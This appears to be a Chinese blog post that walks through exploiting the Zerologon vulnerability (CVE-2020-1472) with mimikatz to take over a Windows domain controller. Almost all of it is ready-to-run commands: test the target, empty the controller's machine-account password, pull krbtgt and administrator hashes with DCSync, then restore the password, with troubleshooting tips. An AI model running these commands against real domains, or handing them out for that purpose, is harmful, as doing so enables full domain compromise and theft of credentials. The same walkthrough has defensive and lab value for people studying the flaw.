看我拿下域控之利用mimikatz打cve2020-1472

利用mimikatz利用cve2020-1472

原理在上一节说了,本章不多提,主要介绍mimikatz利用方式

检测目标机是否存在cve2020-1472

 lsadump::zerologon  /target:域控IP  /account:域控主机名$
lsadump::zerologon  /target:192.168.18.20 /account:WIN-H06K3JJM9AO$

在这里插入图片描述

清空域控密码

lsadump::zerologon  /target:域控IP  /account:域控主机名$  /exploit
lsadump::zerologon /target:192.168.18.20 /account:WIN-H06K3JJM9AO$ /exploit

在这里插入图片描述

获取目标机的HASH

 lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm
注意:本地测试需要将DNS指向域控

lsadump::dcsync /domain:abc.com /dc:DC.abc.com /user:administrator /authuser:WIN-H06K3JJM9AO$ /authdomain:abc.com /authpassword:"" /authntlm

Bp9SXQ.md.png

恢复密码

lsadump::postzerologon /target:dc.de1ay.com /account:dc$
lsadump::postzerologon /target:192.168.18.20 /account:WIN-H06K3JJM9AO$ 

BpMxIK.md.png

注:mimikatz在读取域内HASH的时候需要配置DNS 指向域控 /dc: win08.test.com 这里填写域控的完整的名字 ; 输入参数都正确的情况还获取不了, 重启AD服务 在恢复密码的时候注意先去运行privilege::debug

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值